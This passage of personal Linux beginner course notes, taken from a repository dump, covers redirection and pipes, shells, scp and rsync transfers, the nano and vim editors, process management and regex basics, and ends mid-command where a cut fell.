| - **1** - `stdout` : the standard output stream 8 | - **2** - `stderr` : the standard error stream (printed on the screen by default) 9 | - All three streams can be redirected. 10 | 11 | ```bash 12 | sudo ls /root 13 | [sudo] password for user: # This is the std input 14 | snap # This is the std output 15 | 16 | ls /root 17 | ls: cannot open directory '/root': Permission denied # This is the std error 18 | ``` 19 | 20 | ## Redirection symbols 21 | 22 | - The **`>`** symbol is used for redirect stdout to a file. 23 | - If the redirection points to a file that already exists, this file will be **overwritten**! 24 | 25 | ```bash 26 | ls /etc/ > etc-contents.txt 27 | # The content of the file is the same as the normal content of the command 28 | ``` 29 | 30 | - The **`>>`** symbol is used to append stdout to a file. 31 | 32 | ```bash 33 | ls /tmp/ >> etc-contents.txt 34 | ``` 35 | 36 | - The **`<`** symbol is used for redirect stdin input to a command. 37 | 38 | ```bash 39 | head < /etc/passwd 40 | # The shell took the content of the passwd file and sent it to the head utility 41 | ``` 42 | 43 | - Redirect standard error to a file. 44 | - To suppress the error messagges from being displayed on the screen, redirect stderr to `/dev/null`. 45 | 46 | ```bash 47 | find / -name 'file1.txt' 2> errors.txt 48 | /home/user/Documents/file1.txt 49 | /home/user/Documents/dir1/file1.txt 50 | 51 | ls -lah errors.txt 52 | -rw-rw-r-- 1 user user 89K ott 10 21:07 errors.txt 53 | 54 | # Redirect to /dev/null 55 | find / -name 'file1.txt' 2> /dev/null 56 | 57 | # Redirect both stdout and stderr to the same file 58 | find / -name 'file1.txt' &> all.txt 59 | 60 | # Redirect stdout to all.txt and stderr to the same location as stdout 61 | find / -name 'file1.txt' > all.txt 2>&1 62 | ``` 63 | 64 | ## Pipes 65 | 66 | - **`|`** - Pipes can connect the **stdout** of one command to the **stdin** of another command. 67 | 68 | ```bash 69 | ls -l /etc/ | less 70 | # Send the output of the ls command as input to the less command 71 | 72 | ls -l /etc/ | head -n 20 | tail -n 5 73 | 74 | find / -name 'file1.txt' | less 75 | 76 | find / -name 'file1.txt' |& less 77 | # Send stdout and stderr to less command 78 | ``` 79 | 80 | ------ 81 | 82 | -------------------------------------------------------------------------------- /linux-101/6-shells/shells.md: -------------------------------------------------------------------------------- 1 | # Common Command Line Shells 2 | 3 | - There are a few available command line shells available in Linux. 4 | - Not all shells are installed by default. 5 | - SH is not BASH: 6 | - **Shell Command Language** is a programming language 7 | - **Bash** is one of the many implementations of the Shell Command Language 8 | - Different built-in commands. Some commands are built into the shell itself (`cd`). 9 | 10 | ### [Bash](https://www.gnu.org/software/bash/manual/bash.html) 11 | 12 | - Bourne-Again Shell - default on most systems 13 | - Used for scripting and interactive purposes 14 | 15 | ### Ksh (Kornshell) 16 | 17 | - Generally used to automate a wide variety of o.s. and sysadmin tasks 18 | 19 | ### [Zsh](https://www.zsh.org/) 20 | 21 | - Interactive shell 22 | - Incorporates many bash, tcsh, ksh features 23 | 24 | ### Csh/Tcsh 25 | 26 | - ideal for learners of the C programming language 27 | 28 | ### [Fish](https://fishshell.com/) 29 | 30 | - Friendly interactive shell 31 | 32 | > 📌Get some hands on practice with shells: 33 | > 34 | > [Bash scripting cheatsheet](https://devhints.io/bash) 35 | > 36 | > [Learn Shell](https://www.learnshell.org/) 37 | > 38 | > Online Terminals: 39 | > 40 | > [JSLinux](https://bellard.org/jslinux/) 41 | > 42 | > [Copy.sh](https://copy.sh/v86/) 43 | > 44 | > [Webminal](https://www.webminal.org/) (free signup, practice) 45 | 46 | ------ 47 | 48 | -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025192700216.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025192700216.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025192951741.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025192951741.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025193403042.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025193403042.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025193506230.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025193506230.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025193838088.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025193838088.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025222819962.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025222819962.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025223714564.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025223714564.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025223944428.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025223944428.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025231808258.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025231808258.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025234041680.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025234041680.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221025234247348.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221025234247348.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221026214813235.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221026214813235.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221026220434443.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221026220434443.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/.gitbook/assets/image-20221026221343563.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/7-utilities-editors/.gitbook/assets/image-20221026221343563.png -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/README.md: -------------------------------------------------------------------------------- 1 | # Utilities and File Editors 2 | 3 | ### Topics 4 | 5 | - Searching, converting and manipulating text 6 | - Networking and file transfer 7 | 8 | ### Sections 9 | 10 | 1. [Searching and Processing Text](text-manip.md) 11 | 1. [Networking at the Command Line](net-cmd.md) 12 | 1. [File Transfer](files-transfer.md) 13 | 1. [Text Editors and Converters](text-edit.md) 14 | 15 | -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/files-transfer.md: -------------------------------------------------------------------------------- 1 | # File Transfer 2 | 3 | - Use the command line shell to fransfer files. 4 | 5 | ## Commands 6 | 7 | ### scp 8 | 9 | - **`scp`** - secure file/dir copy using encrypted SSH protocol 10 | 11 | ```bash 12 | # Copy file from a local pc to a remote pc 13 | scp file.txt 192.168.1.50:/home/user/ 14 | # scp Source_path Destination_path 15 | 16 | # Copy a directory and its contents 17 | scp -r files 192.168.1.50:/home/user/ 18 | # "files" is a directory 19 | 20 | # Copy file from remote 21 | scp 192.168.1.50:/home/user/remote-file.txt /home/user/ 22 | 23 | # Use a remote user 24 | scp file.txt user2@192.168.1.50:/home/user2/ 25 | file.txt 100% 8 1.9KB/s 00:00 26 | ``` 27 | 28 | ### rsync 29 | 30 | - **`rsync`** - fast and versatile file-copying tool for synchronizing files and directories between two locations over a remote shell (or local) 31 | - it is widely used for backups and mirroring 32 | - it sends only the differences between the source files and the existing files in the destination. 33 | 34 | 35 | ```bash 36 | # Copy file from local pc to remote pc 37 | rsync -azvh file2.txt user@192.168.1.50:/tmp/ 38 | user@192.168.1.50's password: 39 | sending incremental file list 40 | file2.txt 41 | sent 119 bytes received 35 bytes 44.00 bytes/sec 42 | total size is 7 speedup is 0.05 43 | # a = archive mode - recursive copying into directories and preserve files user permissions and ownership 44 | # v = verbose mode 45 | # z = compress data during transfer (beneficial for large files) 46 | # h = human readable format output 47 | 48 | rsync -azvh --progress file2.txt user@192.168.1.50:/tmp/ 49 | file2.txt 7 100% 0.00kB/s 0:00:00 (xfr#1, to-chk=0/1) 50 | sent 119 bytes received 35 bytes 34.22 bytes/sec 51 | total size is 7 speedup is 0.05 52 | # Check the total bytes sent 53 | 54 | --dry-run # Test run with no changes made 55 | ``` 56 | 57 | ------ 58 | 59 | -------------------------------------------------------------------------------- /linux-101/7-utilities-editors/text-edit.md: -------------------------------------------------------------------------------- 1 | # Text Editors and Converters 2 | 3 | - There is a difference between text files in Windows, MacOS and Linux. 4 | - The end of the line in text files is a different character for each O.S - the `line terminator`. 5 | - Win - **`\n\r`** 6 | - MacOS - **`\r`** (control) 7 | - Linux - **`\n`** (line feed) 8 | 9 | ## Commands 10 | 11 | ### file 12 | 13 | - **`file`** - determine file type 14 | 15 | ```bash 16 | # Check the line terminators 17 | file sample_win.txt sample_mac.txt sample_unix.txt 18 | sample_win.txt: ASCII text, with CRLF line terminators 19 | sample_mac.txt: ASCII text, with CR line terminators 20 | sample_unix.txt: ASCII text 21 | ``` 22 | 23 | - Converting files with dos2unix/unix2dos tools: 24 | 25 | ### dos2unix 26 | 27 | - **`dos2unix`** / **`unix2dos`** 28 | 29 | ```bash 30 | sudo apt install dos2unix 31 | 32 | # Convert unix file to dos new file 33 | unix2dos -n sample_unix.txt temp.txt 34 | unix2dos: converting file sample_unix.txt to file temp.txt in DOS format... 35 | file temp.txt 36 | temp.txt: ASCII text, with CRLF line terminators 37 | 38 | unix2dos -c mac sample_unix.txt 39 | unix2dos: converting file sample_unix.txt to Mac format... 40 | file sample_unix.txt 41 | sample_unix.txt: ASCII text, with CR line terminators 42 | 43 | # Convert dos file to unix file 44 | dos2unix sample_dos.txt 45 | dos2unix: converting file sample_dos.txt to Unix format... 46 | file sample_dos.txt 47 | sample_dos.txt: ASCII text 48 | 49 | ``` 50 | 51 | ## Editors 52 | 53 | ### nano 54 | 55 | - **`nano`** - small editor 56 | - pening multiple files, scrolling per line, undo/redo, syntax coloring, line numbering, and soft-wrapping overlong lines. 57 | 58 | ```bash 59 | nano example.txt 60 | 61 | # Shortcuts are deisplayed at the bottom of the screen 62 | # ^ = press CTRL + specified short key 63 | # M- = press ALT + specified short key 64 | ``` 65 | 66 | ![](.gitbook/assets/image-20221026214813235.png) 67 | 68 | - Press `CTRL+G` to enter the Help menu 69 | - Press `ALT+X` to disable Help mode 70 | - Scroll with `PgUp` and `PgDown` keys 71 | - Press `CTRL+C` to find the cursor location 72 | - Undo a change with `ALT+U` 73 | - `ALT+A` start a selection at the current cursor location and move the cursor 74 | - `ALT+6` to copy the selected text 75 | - `CTRL+U` to paste the copied text 76 | - `CTRL+W` to search content - `ALT+W`/`ALT+Q` to keep searching for the same content 77 | - `CTRL+O` to save file 78 | - `CTRL+X` to exit file 79 | 80 | ![Nano Keyboard Shortcuts - by bipinthite](.gitbook/assets/image-20221026220434443.png) 81 | 82 | ### vim 83 | 84 | - **`vim`** - Vi IMproved text editor 85 | 86 | > 📌 Check the [VimHelp manual](https://vimhelp.org/) for more advanced Vim functionalities. 87 | 88 | | WHAT | PREPEND | EXAMPLE | 89 | | :------------------: | :-----: | :-----------------: | 90 | | Normal mode command | | `:help x` | 91 | | Visual mode command | `v_` | `:help v_u` | 92 | | Insert mode command | `i_` | `:help i_` | 93 | | Command-line command | `:` | `:help :quit` | 94 | | Command-line editing | `c_` | `:help c_` | 95 | | Vim command argument | `-` | `:help -r` | 96 | | Option | `'` | `:help 'textwidth'` | 97 | | Regular expression | `/` | `:help /[` | 98 | 99 | ```bash 100 | vim example.txt 101 | # Vim opens in the command mode 102 | ``` 103 | 104 | - Press **`i`** for insert mode 105 | - Press `ESC` key to exit insert mode 106 | - Exit vim with **`:q`** 107 | - Exit without save with **`:q!`** 108 | - Save and exit with **`:wq`** 109 | - Search with `/text_to_search` 110 | - `n`/`N`to scroll through searching 111 | 112 | ![VIM Cheat Sheet - by typo209](.gitbook/assets/image-20221026221343563.png) 113 | 114 | ------ 115 | 116 | -------------------------------------------------------------------------------- /linux-101/8-process-manag/.gitbook/assets/image-20221029114008847.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/8-process-manag/.gitbook/assets/image-20221029114008847.png -------------------------------------------------------------------------------- /linux-101/8-process-manag/.gitbook/assets/image-20221029115152902.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/8-process-manag/.gitbook/assets/image-20221029115152902.png -------------------------------------------------------------------------------- /linux-101/8-process-manag/.gitbook/assets/image-20221029115331049.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/8-process-manag/.gitbook/assets/image-20221029115331049.png -------------------------------------------------------------------------------- /linux-101/8-process-manag/.gitbook/assets/image-20221029120001281.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/8-process-manag/.gitbook/assets/image-20221029120001281.png -------------------------------------------------------------------------------- /linux-101/8-process-manag/.gitbook/assets/image-20221029120425744.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/8-process-manag/.gitbook/assets/image-20221029120425744.png -------------------------------------------------------------------------------- /linux-101/8-process-manag/.gitbook/assets/image-20221105091330993.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/8-process-manag/.gitbook/assets/image-20221105091330993.png -------------------------------------------------------------------------------- /linux-101/8-process-manag/README.md: -------------------------------------------------------------------------------- 1 | # Process Management 2 | 3 | ### Topics 4 | 5 | - Processes information and management 6 | - Scheduling processes 7 | 8 | ### Sections 9 | 10 | 1. [Process Information](process-info.md) 11 | 1. [Foreground and Background Processes](process-fg-bg.md) 12 | 1. [Managing Processes](process-manage.md) 13 | 1. [Scheduling Processes](process-sched.md) 14 | 15 | -------------------------------------------------------------------------------- /linux-101/8-process-manag/process-fg-bg.md: -------------------------------------------------------------------------------- 1 | # Foreground and Background Processes 2 | 3 | - Usually when running a command in the command shell, the user has to wait for the process to finish before he can do anything else. 4 | - The command is being run as a **foreground process**. 5 | - Only one foreground process can be running in a shell at a time. 6 | 7 | ![](.gitbook/assets/image-20221029115152902.png) 8 | 9 | - A user can have more **background processes** running at the same time. 10 | - Start a process in the background with **`&`** 11 | 12 | ![](.gitbook/assets/image-20221029115331049.png) 13 | 14 | - Currently running processes can be moved from the foreground to the background and viceversa. 15 | - **`CTRL+Z`** - suspend/pause the process 16 | - **`jobs`** - list the active jobs 17 | - **`bg`** - move the process to the background 18 | - **`fg`** - move the process back to the foreground 19 | 20 | ![](.gitbook/assets/image-20221029120001281.png) 21 | 22 | ![](.gitbook/assets/image-20221029120425744.png) 23 | 24 | - **`+`** = fg/bg commands operate on the + process 25 | - use the job number to fg/bg that process 26 | 27 | ### jobs 28 | 29 | - **`jobs`** - list all the active jobs 30 | 31 | ### fg / bg 32 | 33 | - **`fg`** - move jobs to the foreground 34 | - **`bg`** - move jobs to the background 35 | 36 | ------ 37 | 38 | -------------------------------------------------------------------------------- /linux-101/8-process-manag/process-info.md: -------------------------------------------------------------------------------- 1 | # Process Information 2 | 3 | - Managing processes can be useful for troubleshooting running programs on the operating system. 4 | 5 | ## Commands 6 | 7 | ### ps 8 | 9 | - **`ps`** - display current running processes 10 | - 3 types of options (UNIX, BSD, GNU) - pick a format and stick with it. 11 | 12 | ```bash 13 | ps 14 | PID TTY TIME CMD 15 | 3131 pts/1 00:00:00 bash 16 | 3157 pts/1 00:00:00 ps 17 | 18 | # Options: 19 | 1 UNIX options, which may be grouped and must be preceded by a dash. 20 | 2 BSD options, which may be grouped and must not be used with a dash. 21 | 3 GNU long options, which are preceded by two dashes. 22 | 23 | # Display all the processes for users using BSD syntax 24 | ps ax | less -S 25 | 26 | # Display all the processes for users using UNIX syntax 27 | ps -e | less -S 28 | 29 | ps aux 30 | USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 31 | root 1 0.2 0.2 100992 11880 ? Ss 11:03 0:02 /sbin/init splash 32 | root 2 0.0 0.0 0 0 ? S 11:03 0:00 [kthreadd] 33 | root 3 0.0 0.0 0 0 ? I< 11:03 0:00 [rcu_gp] 34 | [...] 35 | 36 | ps -ef 37 | UID PID PPID C STIME TTY TIME CMD 38 | root 1 0 0 11:03 ? 00:00:02 /sbin/init splash 39 | root 2 0 0 11:03 ? 00:00:00 [kthreadd] 40 | root 3 2 0 11:03 ? 00:00:00 [rcu_gp] 41 | 42 | user 3131 2986 0 11:10 pts/1 00:00:00 bash 43 | root 3238 2 0 11:18 ? 00:00:00 [kworker/1:0-events] 44 | root 3239 2 0 11:19 ? 00:00:00 [kworker/u256:0-events_unbound] 45 | user 3240 3131 0 11:21 pts/1 00:00:00 ps -ef 46 | [...] 47 | # USER = user ID of the process (same premissions as the user) 48 | # PID = process ID (unique for every process) 49 | # PPID = parrent PID - PID of the parrent process that created this process 50 | # C = process utilization percentage 51 | # STIME = start time of the process 52 | # TTY = terminal use of the process (no associated terminal if ?) 53 | # TIME = amount of CPU time used by the process 54 | # CMD = command that started the process 55 | 56 | # Display every process running as root 57 | ps -U root -u root u 58 | 59 | # Check examples on the manual page 60 | man ps 61 | 62 | # Show process hierarchy 63 | ps -eH | less -S 64 | ``` 65 | 66 | ### pstree 67 | 68 | - **`pstree`** - display a tree of processes (hierarchy easier to read) 69 | 70 | ```bash 71 | pstree 72 | systemd─┬─ModemManager───2*[{ModemManager}] 73 | ├─NetworkManager───2*[{NetworkManager}] 74 | ├─VGAuthService 75 | ├─accounts-daemon───2*[{accounts-daemon}] 76 | ├─acpid 77 | ├─avahi-daemon───avahi-daemon 78 | ├─bluetoothd 79 | ├─colord───2*[{colord}] 80 | ├─cron 81 | ├─cups-browsed───2*[{cups-browsed}] 82 | ├─cupsd 83 | ├─dbus-daemon 84 | ├─fwupd───4*[{fwupd}] 85 | ├─gdm3─┬─gdm-session-wor─┬─gdm-wayland-ses─┬─gnome-session-b───2*[{gnome-session-b}] 86 | │ │ │ └─2*[{gdm-wayland-ses}] 87 | │ │ └─2*[{gdm-session-wor}] 88 | │ └─2*[{gdm3}] 89 | ``` 90 | 91 | ### top 92 | 93 | - **`top`** - display a dynamic real-time view of Linux running processes 94 | - display system summary information too 95 | - user configurable 96 | 97 | ```bash 98 | top 99 | # Process are ordered by most CPU usage to least 100 | ``` 101 | 102 | ![](.gitbook/assets/image-20221029114008847.png) 103 | 104 | > 📌 Check **`htop`** [command](https://www.geeksforgeeks.org/htop-command-in-linux-with-examples/) too. 105 | 106 | ------ 107 | 108 | -------------------------------------------------------------------------------- /linux-101/8-process-manag/process-manage.md: -------------------------------------------------------------------------------- 1 | # Managing Processes 2 | 3 | - A Linux process can be in one of a few states: 4 | - **running** = the CPU is executing a process 5 | - **`CTRL+Z`** to stop the process from running 6 | - Linux sends a STOP signal to the process and the process enters the stopped state 7 | - **sleeping** = the process sleeps when it is waiting on a resource 8 | - **zombie** = the remains of processes that weren't properly cleaned up when they died 9 | - when a process dies, its parent process gets some information from the deceased process and then cleans everything up 10 | - a zombie process doesn't respond to the normal signals used to shut it down 11 | - The processes change their state in response to **SIGNALS**. 12 | 13 | ![](.gitbook/assets/image-20221105091330993.png) 14 | 15 | ## Commands 16 | 17 | ### kill 18 | 19 | - **`kill`** - send a signal to a process 20 | - the default signal for kill is **TERM** 21 | 22 | ```bash 23 | kill -l 24 | 1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP 25 | 6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1 26 | 11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM 27 | 16) SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP 28 | 21) SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ 29 | 26) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR 30 | 31) SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3 31 | 38) SIGRTMIN+4 39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8 32 | 43) SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13 33 | 48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12 34 | 53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7 35 | 58) SIGRTMAX-6 59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2 36 | 63) SIGRTMAX-1 64) SIGRTMAX 37 | 38 | # 1) SIGHUP: reload a process (without restarting the process) 39 | # 19) SIGSTOP: it is sent to a foreground process to stop it from running (CTRL+Z) 40 | # 15) SIGTERM: default sent signal whe no signal is specified 41 | # 9) SIGKILL: force the process to shutdown if other sent signals are ignored (last resort, no cleaning up) 42 | 43 | # To send a signal to a process, its process ID must be known 44 | xeyes & 45 | [1] 5660 46 | ps -ef | grep xeyes 47 | user 5660 4609 0 09:41 pts/0 00:00:00 xeyes 48 | user 5666 4609 0 09:41 pts/0 00:00:00 grep --color=auto xeyes 49 | kill 5660 50 | # Process terminated 51 | 52 | # Force kill a process with the 9) SIGKILL signal 53 | kill -9 5668 54 | # It can leave local/temporary files hiding on the file system 55 | ``` 56 | 57 | ### pkill 58 | 59 | - **`pkill`** - look up, signal, or wait for processes based on name and other attributes 60 | - It kills every process containing that name or attribute, pay attention! 61 | 62 | ```bash 63 | pkill xeyes 64 | [1]- Terminated xeyes 65 | [2]+ Terminated xeyes 66 | # A SIGTERM is sent to both processes 67 | ``` 68 | 69 | ### sleep 70 | 71 | - **`sleep`** - delay for a specified amount of time 72 | - used for delays into bash scripting 73 | 74 | ```bash 75 | sleep 5 76 | # pause for 5 seconds 77 | ``` 78 | 79 | ------ 80 | 81 | -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106121128550.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106121128550.png -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106122654661.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106122654661.png -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106123143626.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106123143626.png -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106123519496.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106123519496.png -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106134143911.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106134143911.png -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106134636112.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106134636112.png -------------------------------------------------------------------------------- /linux-101/9-regex/.gitbook/assets/image-20221106135932189.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/9-regex/.gitbook/assets/image-20221106135932189.png -------------------------------------------------------------------------------- /linux-101/9-regex/README.md: -------------------------------------------------------------------------------- 1 | # Regular Expressions 2 | 3 | ### Topics 4 | 5 | - What's a regular expression 6 | - Usage and building of regular expressions 7 | 8 | ### Sections 9 | 10 | 1. [Regular Expressions, Searching, Replacing, Building](regex-use.md) 11 | 12 | -------------------------------------------------------------------------------- /linux-101/9-regex/regex-use.md: -------------------------------------------------------------------------------- 1 | # Regular Expressions, Searching, Replacing, Building 2 | 3 | ## What is a Regular Expression 4 | 5 | - A regular expression (**`regex`**) is a pattern that matches a set of strings, consisting of operators, constructs literal characters and meta-characters. 6 | 7 | > 📌 **grep** command supports tree regex syntaxes. Check some basics usage [here](https://linuxize.com/post/regular-expressions-in-grep/). 8 | 9 | - Regular expressions are powerful, used in areas like search engines, programming languages and text processing applications. 10 | 11 | ### Examples 12 | 13 | - Check [how to find or validate an Email Address](https://www.regular-expressions.info/email.html) - [RFC 5322](https://www.ietf.org/rfc/rfc5322.txt) Official Standard 14 | - More examples here [emailregex.com](https://emailregex.com/) 15 | 16 | ```bash 17 | # Find all email addresses in a file using grep 18 | grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" filename.txt 19 | 20 | # Python 21 | r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)" 22 | 23 | # Javascript 24 | /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/ 25 | 26 | #MySQL 27 | SELECT * FROM `users` WHERE `email` NOT REGEXP '^[A-Z0-9._%-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$'; 28 | ``` 29 | 30 | ## Searching with RegEx 31 | 32 | - There a 4 primary components into a regular expression: 33 | - character classes 34 | - quantifiers and alternation 35 | - anchors 36 | - roots and anchors 37 | 38 | ### [Date Search](https://regexr.com/66ogg) 39 | 40 | ```javascript 41 | ^[A-Z][a-z]{2,}\s+[0-3]?[1-9],\s+[12]?[0-9]{0,3}$ 42 | /* 43 | ^ = ANCHOR - match the beginning of the string or line (with the multiline flag m) 44 | [A-Z][a-z] = CHARACTER CLASSES - range matching upper/lower case letters 45 | {2,} = QUANTIFIER - match 2 or more of the preceding token 46 | \s = whitespace 47 | + = QUANTIFIER - match 1 or more of the preceding whitespace 48 | * = QUANTIFIER - match 0 or more of the preceding token 49 | ? = QUANTIFIER - optional, match 0 or 1 of the preceding token 50 | | = QUANTIFIER - alternation, match 1 token or another 51 | $ = ANCHOR - match the end of the string or line (with the multiline flag m) 52 | */ 53 | ``` 54 | 55 | ![](.gitbook/assets/image-20221106121128550.png) 56 | 57 | ### [Number >= 42 Search](https://regexr.com/66ogj) 58 | 59 | ```javascript 60 | ^4[2-9]|[5-9]\d|[1-9]\d{2,}$ 61 | /* 62 | \d = match any digit character (0-9) = [0-9] 63 | */ 64 | ``` 65 | 66 | ![](.gitbook/assets/image-20221106122654661.png) 67 | 68 | ![](.gitbook/assets/image-20221106123143626.png) 69 | 70 | ```bash 71 | grep -E "^4[2-9]|[5-9]\d|[1-9]\d{2,}$" numbers.txt 72 | 42 73 | # grep (posix) doesn't have the \d shortcut for digits 74 | 75 | grep -E 